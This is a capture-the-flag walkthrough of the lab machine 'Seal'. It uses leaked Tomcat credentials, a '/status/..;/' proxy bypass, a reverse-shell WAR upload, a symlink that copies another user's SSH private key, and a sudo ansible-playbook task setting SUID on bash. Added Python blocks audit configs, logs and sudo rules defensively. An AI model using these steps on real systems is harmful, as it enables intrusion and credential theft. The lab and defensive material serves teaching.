In this post, I would like to share a walkthrough of the Seal Machine.


This machine is rated as medium difficulty.

Information Gathering on Seal Machine


Once the VPN connection is up, we can start information gathering on the machine by running nmap -sC -sV -p- -Pn <IP Address>

# Nmap 7.91 scan initiated Mon Jul 12 21:30:43 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.250
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency)
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 13 Jul 2021 01:44:48 GMT
|     Set-Cookie: JSESSIONID=node0hnabifqaxoy718gb842iywilt193.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 13 Jul 2021 01:44:46 GMT
|     Set-Cookie: JSESSIONID=node0ba5l1frprgu2fwdfykhazky6191.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 13 Jul 2021 01:44:47 GMT
|     Set-Cookie: JSESSIONID=node016ot8bocmvot7y8baiml78ulf192.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=7/12%Time=60ECED14%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Tue,\x2013\x2
SF:0Jul\x202021\x2001:44:46\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node0ba5l1
SF:frprgu2fwdfykhazky6191\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Th
SF:u,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/htm
SF:l;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,10A,"HT
SF:TP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2013\x20Jul\x202021\x2001:44:47\
SF:x20GMT\r\nSet-Cookie:\x20JSESSIONID=node016ot8bocmvot7y8baiml78ulf192\.
SF:node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\
SF:x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAllow
SF::\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
SF:est,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20text
SF:/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20clo
SF:se\r\n\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Vers
SF:ion</pre>")%r(FourOhFourRequest,F6,"HTTP/1\.1\x20401\x20Unauthorized\r\
SF:nDate:\x20Tue,\x2013\x20Jul\x202021\x2001:44:48\x20GMT\r\nSet-Cookie:\x
SF:20JSESSIONID=node0hnabifqaxoy718gb842iywilt193\.node0;\x20Path=/;\x20Ht
SF:tpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nC
SF:ontent-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n
SF:")%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r\
SF:nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069
SF:\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reas
SF:on:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\.1\
SF:x20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/htm
SF:l;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r
SF:\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20characte
SF:r\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20cha
SF:racter\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\r
SF:\nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Messa
SF:ge\x20400</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pre>"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 12 21:32:32 2021 -- 1 IP address (1 host up) scanned in 109.27 seconds

We need to add a hosts entry on our own machine that maps the domain name seal.htb to the machine's IP address.


Let's open the browser and go straight to the website interface.


We didn't see any useful information on the website interface.



Let's access the website via port 8080; the interface will look as shown in the screenshot above.


There's a "create one" link that lets us register a new account.

We can enter any details during registration so that we can log in to the GitBucket dashboard.

Gaining Privileges Access on Seal Machine


Finally, we have managed to log into the dashboard, whose interface looks as shown above.


From the normal website previously, we noticed that the web title is "Seal Market".


The website opens the Seal Market app, to which the developer has made 13 commits.


Without further ado, let's open the commits page and see what it contains.


I analyzed the commits that appear here, and one commit (its hash starts with ac210325af) stood out compared to the others.


I found a tomcat folder within the commit that we opened previously.


There should be a configuration file saved as tomcat-users.xml, which might contain the username and password for the website.


Finally, the username and password are revealed in the tomcat-users.xml configuration.


From the Tomcat configuration, we notice there's a manager-gui role, which suggests a /manager/ directory. Let's access it with the credentials we found previously.
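The root cause here is a tomcat-users.xml committed to a repository with a manager-gui role and an inline password. The following is an added example (not code from the original post or from the Seal machine) showing how a defender can audit such a file and flag secret-bearing paths in a repository listing; the XML sample is constructed with placeholder values in the shape of a stock tomcat-users.xml, and the filename list is an assumption of what an organisation might treat as sensitive.

```python
import xml.etree.ElementTree as ET

# Roles that grant control over deployed applications or the manager app itself.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Basenames that should never appear in a repository's history (assumed list).
SENSITIVE_FILENAMES = {"tomcat-users.xml", "id_rsa", ".env", "credentials.json"}

# Constructed sample shaped like a stock tomcat-users.xml; every value is a placeholder.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <role rolename="reports"/>
  <user username="tomcat" password="PLACEHOLDER_PASSWORD" roles="manager-gui,admin-gui"/>
  <user username="analyst" password="PLACEHOLDER_PASSWORD_2" roles="reports"/>
</tomcat-users>
"""


def _local_name(tag):
    """Strip the XML namespace so <user> matches with or without an xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per <user> that stores a password inline or holds a privileged role."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        username = elem.get("username") or elem.get("name")
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        inline_password = elem.get("password") is not None
        if privileged or inline_password:
            findings.append({
                "username": username,
                "privileged_roles": privileged,
                "inline_password": inline_password,
            })
    return findings


def flag_sensitive_paths(paths):
    """Return the repository paths whose basename is a known secret-bearing file."""
    return [p for p in paths if p.rsplit("/", 1)[-1] in SENSITIVE_FILENAMES]


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
    print(flag_sensitive_paths(["README.md", "tomcat/tomcat-users.xml", "src/app.py"]))
```

Feeding the output of a `git ls-tree -r --name-only` over every commit into `flag_sensitive_paths` catches files that were later deleted but still live in history, which is exactly the case this walkthrough exploits.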


As a result, we managed to gain access to the Tomcat Web Application Manager. We will need to upload a malicious file through this interface for the next step.


After creating the malicious file on our machine, we need to start our nc listener so that it can catch the reverse shell.


The upload process looks as shown in the screenshot above.


We should intercept the request in Burp Suite Community after clicking the deploy button.


We need to modify the request by adding /status/..;/ after the manager directory and before html. Next, click the forward button to send the request to the server.
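What makes this rewrite work is a mismatch: the reverse proxy in front of Tomcat matches the literal path, while Tomcat strips the ";" path parameter and resolves the ".." segment, so a prefix rule on /manager/html never sees the request. The following is an added example (not from the original post) of detection logic for that mismatch over access log lines; the log lines are constructed, and the protected prefixes and log format are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Common/combined access log format: client, identity, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)

# Paths a front-end proxy is assumed to deny by prefix.
PROTECTED_PREFIXES = ("/manager/", "/host-manager/")


def normalize_path(raw_target):
    """Resolve the path the way a servlet container does: percent-decode,
    drop ';param' path parameters per segment, then collapse '.' and '..'."""
    path = unquote(urlsplit(raw_target).path)
    resolved = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(seg)
    return "/" + "/".join(resolved)


def analyze_request(line):
    """Return a finding if the proxy-visible path and the container-resolved
    path disagree about reaching a protected prefix, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group("target")
    decoded_path = unquote(urlsplit(raw).path)
    resolved = normalize_path(raw)
    reasons = []
    # A segment such as '..;' is the evasion itself: the proxy sees 'status/..;', Tomcat sees '..'.
    if any(";" in seg and seg.split(";", 1)[0] == ".." for seg in decoded_path.split("/")):
        reasons.append("dot-segment hidden behind a path parameter")
    if resolved.startswith(PROTECTED_PREFIXES) and resolved != decoded_path:
        reasons.append("resolved path reaches a protected prefix the literal path does not show")
    if not reasons:
        return None
    return {
        "client": m.group("client"),
        "method": m.group("method"),
        "target": raw,
        "resolved": resolved,
        "status": int(m.group("status")),
        "reasons": reasons,
    }


def scan_log(lines):
    """Run analyze_request over every line and keep the findings."""
    return [f for f in (analyze_request(line) for line in lines) if f]


# Constructed sample log lines (not captured from the machine); the nonce value is a placeholder.
SAMPLE_LOG = [
    '10.10.14.1 - - [12/Jul/2021:21:40:01 +0000] "GET /manager/html HTTP/1.1" 403 1234',
    '10.10.14.1 - - [12/Jul/2021:21:40:05 +0000] "GET /manager/status/..;/html HTTP/1.1" 200 5678',
    '10.10.14.1 - - [12/Jul/2021:21:40:09 +0000] "POST /manager/status/%2e%2e;/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 100',
    '10.10.14.2 - - [12/Jul/2021:21:41:00 +0000] "GET /index.html HTTP/1.1" 200 321',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The mitigation is the same mismatch in reverse: either deny /manager/ as a whole at the proxy rather than a single sub-path, or have the proxy normalize the path the same way the container will before it evaluates any rule.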


As a result, the file has been saved on the dashboard as shown in the screenshot above. To obtain the connection back to us, we need to click on the file (the same file we saved during the msfvenom step).


When we look back at the reverse shell terminal, the connection has come back to us.

Maintaining Privileges Access


Let's see which directory we landed in.


We need to look at the /opt/backups/ directory, where we spotted a playbook directory.


Let's read the content stored within the run.yml file.


We found a directory that we can use for further escalation to obtain the user flag.


No file is stored within the uploads directory.


Without further ado, we should be able to retrieve luis's key by executing the command "ln -s /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads"


In the end, id_rsa shows up in the uploads directory, but it's unreadable there. Because of that, we move the copied file into the /tmp directory.


After that, we can copy the id_rsa onto our attacker machine, from which we will be able to access the machine via the ssh service.


Before we can log into the machine via ssh, we need to set permission 600 on the id_rsa file.


We should be able to read the user flag by executing the command "cat user.txt"

Escalate to Root Privileges Access


By running the sudo -l command, we see that we can run ansible-playbook as root via sudo. We can abuse this ansible-playbook rule.


We need to create a file (anyname.yml) containing the following playbook:

- hosts: localhost
  tasks:
    - name: darknite
      command: "chmod +s /bin/bash"

In order to get root privileges, we execute the command "sudo /usr/bin/ansible-playbook anyname.yml"
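The sudo rule is the weak point: ansible-playbook exists to run whatever tasks the caller writes, so a sudo rule on it is a rule on "run anything as root". The following is an added example (not from the original post) of a small audit that parses `sudo -l` output and flags rules of that shape; the sample output is constructed in the shape of the finding described above, and the list of code-running binaries is an assumption a defender would tune to their own fleet.

```python
import os
import re

# One sudo rule as printed by `sudo -l`: "(runas) TAG: command, command".
SUDO_RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$'
)

# Programs whose normal job is to execute caller-supplied code or tasks (assumed list).
CODE_RUNNERS = {"ansible-playbook", "ansible", "python", "python3", "perl", "bash", "sh"}

# Constructed sample in the shape of `sudo -l` output; not captured from the machine.
SAMPLE_SUDO_L = """Matching Defaults entries for luis on seal:
    env_reset, mail_badpass

User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *
    (root) /usr/bin/systemctl restart nginx
"""


def parse_sudo_l(text):
    """Turn `sudo -l` output into one dict per permitted command."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and the "User X may run" banner do not start with "("
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(", "):
            rules.append({
                "runas": m.group("runas"),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd.strip(),
            })
    return rules


def risky_rules(rules):
    """Flag rules that amount to arbitrary code execution as the target user."""
    flagged = []
    for rule in rules:
        cmd = rule["command"]
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command")
        else:
            binary = os.path.basename(cmd.split()[0])
            if binary in CODE_RUNNERS:
                reasons.append(f"{binary} executes caller-supplied code")
            if "*" in cmd:
                reasons.append("wildcard lets the caller choose the arguments")
        if reasons:
            flagged.append({**rule, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(rule)
```

A rule that survives this audit constrains both the binary and its arguments; for a task runner the fix is usually a dedicated wrapper script with a fixed playbook path and no user-controlled arguments.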


Voila! We have gained root privileges on the machine.


We can read the root flag by executing the "cat root.txt" command.